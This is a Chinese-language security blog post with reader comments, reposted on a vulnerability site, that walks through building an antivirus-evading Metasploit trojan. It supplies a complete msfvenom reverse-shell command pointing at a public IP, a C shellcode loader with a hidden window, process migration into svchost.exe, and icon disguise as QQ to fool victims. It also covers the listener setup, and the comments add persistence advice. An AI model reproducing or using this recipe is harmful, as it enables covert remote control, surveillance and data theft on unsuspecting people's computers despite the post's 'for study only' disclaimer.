CVE漏洞中文网

0DayBank一个专门收集整理全球互联网漏洞的公开发布网站
  1. 首页
  2. 漏洞列表
  3. 正文

木马免杀

2018年11月12日 1014点热度 0人点赞 0条评论
  • FB招聘站
  • 分类阅读
  • 专栏
  • 公开课
  • FIT 2019
  • 企业服务
  • 用户服务
  • 搜索
  • 投稿
  • 登录
  • 注册

Metasploit的简单木马免杀技术及后渗透面临的问题

cureall2018-04-16共292374人围观 ,发现 19 个不明物体工具

*本文原创作者:cureall,本文属FreeBuf原创奖励计划,未经许可禁止转载

PS:本文仅用于技术交流与分享,严禁用于非法用途

698050_f493_3.jpg

一. 配置ngrok准备内网穿透

内网穿透的必要性和原理就不用说了,直接说操作。首先到ngrok官网去注册一个号,国内也有一个sunny ngrok,但是我用了几次全失败了,所以推荐国外的,网址是:https://ngrok.com/。

我注册的时候面临验证码刷不出来,所以建议选择用github账号登陆就好。登陆好之后就在kali下载好对应版本的客户端。下载好之后你需要在kali上用他给你的凭证进行登陆—-命令行输入

./ngrok authtoken (你的凭证字符串)。

凭证可以在官网上复制。

Clipboard Image.png

然后接着输入:

./ngrok tcp 1234

这的1234是你本地的端口,出现如下画面说明你成功了,然后让他一直开着。

Clipboard Image.png

左边就是给你用的端口,右边就是你本地的端口

然后你可以通过ping这个给你的网址得到IP,这个是ping不通的,不过可以得到IP就可以了。这个每次重新穿透的时候都会更换远程端口,这是比较egg疼的,不过免费嘛,算可以了。

Clipboard Image.png

二.木马的伪装与简单免杀

木马面临的最基本的问题就是免杀,如果不能免杀,被杀毒软件发现,其作用几乎为零,至于怎么感染别人,就得看你的忽悠能力或者USB的方式,但是首要的应该是免杀。

我采用的是比较简单的免杀方式,依靠msf生成的shellcode免杀。

在命令行输入:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=52.14.61.47 LPORT=13098 -e x86/shikata_ga_nai -i 15 -b '\x00\' PrependMigrate=true PrependMigrateProc=svchost.exe -f c > /root/Desktop/shellcode.c

这里的paylload选择windows/meterpreter/reverse_tcp,LHOST和LPORT分别填ngrok给你的网址和端口,-e x86/shikata_ga_nai -i 15是用-e x86/shikata_ga_nai编码15次,而PrependMigrate=true PrependMigrateProc=svchost.exe使这个程序默认会迁移到svchost.exe进程,自己测试的时候不建议到这个进程而是其他的持久进程,这样别人打开之后就无法再常规的去关闭回连的会话。你还可以使用windows/meterpreter/reverse_tcp_rc4这个payload,对会话进行加密,增加免杀能力。

相信大家都试过,直接输出exe文件就算注入其他软件和进行编码n遍也会马上被查杀出来。多次测试发现用x86/shikata_ga_na编码超过12次以上再通过shellcode编译出来都能免杀。

如下图你的桌面会有一个shellcode.c文件

Clipboard Image.png

将其移到 windows,用记事本打开会有 :unsigned char buf[] =”一长串数字”

接着就开始编译木马,我使用的是vs2015

下载链接::https://pan.baidu.com/s/1BgxZeCTZoFvpm_lhxcRXCw 密码:bchi

在visual studio下新建一个c++的win32项目将以下代码模板复制进去,在把你得到的shellcode那长串数字复制到shellcode的位置。

#include<stdio.h>

#include<windows.h>

#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")                        //去除窗口

unsigned char shellcode[]= (这里就是shellcode)

void main()

{

LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

memcpy(Memory, shellcode, sizeof(shellcode));

((void(*)())Memory)();

}

编译方法网上有很多种,这个时候已经可以编译了,但是我们还可以对图标进行更改伪装:右击你的项目—>添加—>资源—>图标—>新建,再用电脑的搜索查找*.icon,找到 QQ的图标找到你这个项目的文件夹下会有一个1icon.ico文件,将QQ的图标改成1icon.ico,拖进去替换掉原来的那个图标文件

Clipboard Image.png

然后vs平台就会出现下图:

Clipboard Image.png

这个时候你再编译出来就会是一个QQ图标的木马。具体情况下你可以以此方法任意改图标再重命名,使你的木马更加具有迷惑性。

Clipboard Image.png

我们再使用国内普遍的360杀毒软件测试一下效果,证明可以免杀了

Clipboard Image.png

只要在不影响shellcode的情况下,你可以对这个程序再增加扩展(就看你的c语言功底了),比如这里使用#pragma comment(linker,”/subsystem:\”windows\” /entry:\”mainCRTStartup\”")隐藏程序窗口,并用这个程序取代快捷方式,再通过这个程序调用原来真正的程序基本就神不知鬼不觉了。

其次就是建议各位在测试自己的木马时一定要关闭云端上传功能,360会收集可以软件,上传云端检测,然后备份通杀,所以你的木马没准今天还可以免杀,明天就全国联保了。心疼被吃的一个马。

Clipboard Image.png

三.meterpreter后渗透功能测试

先配置好监听端

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 127.0.0.1

set LPORT 1234

exploit

注意LHOST和LPORT配置为之前和ngrok绑定的本地的端口!!

Clipboard Image.png

然后等待别人运行我们的木马。如下就是成功了。

Clipboard Image.png

然后我让远在异地的女友和我的室友帮我测试了一下,结果也是成功的,具体你们也可以试试。这个时候你基本可以操控很多功能了。

但是我又发现360的行为检测会阻止meterpreter许多功能,简单的getsystem提权绝对失败,通过哈希传递和假冒令牌的方式提权,都会被报可疑程序在调用驱动,甚至拍照都会报可以程序在调用摄像头(部分电脑不会报)

然后msf会收到一张360的调戏图:

Clipboard Image.png

但是你接着第二次使用:

Webcam_snap 1

又不会报并且拍照成功(很奇怪)

再至于常规的持久化控制命令不是失败就是会被360查杀

并将我们的木马曝光(十分危险),而如果尝试关闭360的进程则其核心进程又无法关闭,又尝试运行360的卸载程序,结果又报可以程序在调用360部分文件,非常恼火。

据说通过删除系统文件夹就可以卸载360了,不过不建议,因为那等于暴露了。

希望这篇文章能够帮助大家的学习,但是这些技术仅供学习使用,切不可用这些技术做非法的事,合法上网从我做起

以上就是对于msf的简单利用,我还是一个渗透学习路上的菜鸟,欢迎大家提出过程中的问题,或者为后渗透的问题提供解决办法和思路,谢谢大家

*本文原创作者:cureall,本文属FreeBuf原创奖励计划,未经许可禁止转载

cureall

cureall1 篇文章等级: 2级
|
|
  • 上一篇:Loki:一款简单强大的IOC和事件响应扫描器
  • 下一篇:开源工具 | 宜信漏洞管理平台“洞察”开源啦!

这些评论亮了

  • testccccs回复
    远在异地的女友和我的室友 忽然发现IP地址和背景是同一个地方。。。咳咳咳。。。
    你女朋友头发做的不错
    )16(亮了
发表评论

已有 19 条评论

  • testccccs 2018-04-16回复1楼

    远在异地的女友和我的室友 忽然发现IP地址和背景是同一个地方。。。咳咳咳。。。
    你女朋友头发做的不错

    亮了(16)
    • cureall (2级) 2018-04-16回复

      @ testccccs 因为这篇稿子写了两次,第二次就懒得重新做木马了,但是方法是可行的,就直接本地测试的,不过第二次增加的内容貌似直接没了,联系客服也没回复

      亮了(0)
      • testccccs 2018-04-16回复

        @ cureall  我也就是嘴贱开个玩笑,发上去就后悔了,不好意思哈老哥

        亮了(1)
      • cureall (2级) 2018-07-19回复

        @ testccccs 我感觉被你忽悠了,那里我贴图应该没贴错,我用frp穿透,连接显示也是本地ip,不信你也可以去试试

        亮了(0)
  • 死宅10086 (7级) 2018-04-16回复2楼

    :mrgreen: :mrgreen:

    亮了(0)
    • cureall (2级) 2018-04-16回复

      @ 死宅10086  谢谢

      亮了(0)
  • haya (2级) 2018-04-16回复3楼

    http://www.freebuf.com/sectool/136736.html
    大佬您的文章和我的这个好像很类似啊

    亮了(3)
    • cureall (2级) 2018-04-16回复

      @ haya  看过大佬你的文章,其中有你没的内容,后渗透部分因为提交原因这里没显示

      亮了(0)
      • haya (2级) 2018-04-16回复

        @ cureall  我不是大佬,我之前写的怎么就没钱,不开心233333333,来个文章参考地址吧哈哈

        亮了(0)
      • cureall (2级) 2018-04-16回复

        @ haya  我也没钱哦,而且这个fb提交开始审核之后就不可编辑了,头痛,客服现在还没回话

        亮了(0)
  • 夜尽天明 (6级)千秋邈矣独留我,百战归来再读书 2018-04-16回复4楼

    灰鸽子之类的远控木马或者提权木马可以用msf来免杀?

    亮了(0)
  • y111111en 2018-04-16回复5楼

    大佬v5

    亮了(0)
    • cureall (2级) 2018-04-16回复

      @ y111111en 不是大佬

      亮了(0)
  • Green_m (4级)green-m.github.io 2018-04-16回复6楼

    `msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows LHOST=52.14.61.47 LPORT=13098 -e x86/shikata_ga_nai -i 15 -b ‘\x00\’ PrependMigrate=true PrependMigrateProc=svchost.exe -f c > /root/Desktop/shellcode.c`

    用这个命令生成的shellcode应该过不了windows defender,你试过么

    亮了(0)
    • cureall (2级) 2018-04-16回复

      @ Green_m  试过,没反应

      亮了(0)
  • almama 2018-04-19回复7楼

    没有持久化就是在和时间赛跑,敏感行为被拦截这就是个玩具

    亮了(0)
    • cureall (2级) 2018-07-19回复

      @ almama msf的payload只要还在内存中运行,自己会不断重试回连,只是要注意把payload换成stageless的以免丢失shell,而我用的默认注入svchost.exe的木马,很难杀到进程,一般这个会话可以一直在。然后比如你拿到webshell或已经进去一类的,可以用木马下载类似xampp.exe的软件,再绑上免杀的木马,让管理员保证重启也能运行,能通过伪装实现持久话。行为拦截有很多用户是不开摄像保护这些的,一般的窃取资料能办到

      亮了(0)
  • nini 2018-04-22回复8楼

    那个ping 的ip 隔几分钟变一下就掉线要怎么玩

    亮了(0)
    • cureall (2级) 2018-04-23回复

      @ nini ip变化不会影响使用,你就用一开始得到的就好,如果是国外的ngrok,一般不会掉线

      亮了(0)

 

必须您当前尚未登录。登陆?注册

必须(保密)

表情插图

取消

cureall

cureall

这家伙太懒,还未填写个人描述!

1文章数11评论数

最近文章

Metasploit的简单木马免杀技术及后渗透面临的问题

2018.04.16

浏览更多

相关阅读

  • 无需开启宏即可渗透:在Office文档中利用DDE执行命令
  • 技术讨论 | 简谈渗透测试各阶段我常用的那些“神器”
  • 经验分享 | 一句话免杀编写思路
  • 金山云安珀实验室:四大维度无死角对抗网络黑产
  • Metasploit CVE-2015-5122 Flash漏洞利用教程

特别推荐

关注我们 分享每日精选文章

活动预告

  • 11月

    FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气

    已结束
  • 10月

    【16课时-连载中】挖掘CVE不是梦(系列课程2)

    已结束
  • 10月

    【首节课仅需1元】挖掘CVE不是梦

    已结束
  • 9月

    【已结束】自炼神兵之自动化批量刷SRC

    已结束

FREEBUF

  • 免责声明
  • 协议条款
  • 关于我们
  • 加入我们

广告及服务

  • 寻求报道
  • 广告合作
  • 联系我们
  • 友情链接

关注我们

  • 官方微信
  • 新浪微博
  • 腾讯微博
  • Twitter

赞助商

Copyright © 2018 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号

css.php

正在加载中...

0daybank

标签: 暂无
最后更新:2018年11月12日

小助手

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

COPYRIGHT © 2024 www.pdr.cn CVE漏洞中文网. ALL RIGHTS RESERVED.

鲁ICP备2022031030号

联系邮箱:wpbgssyubnmsxxxkkk@proton.me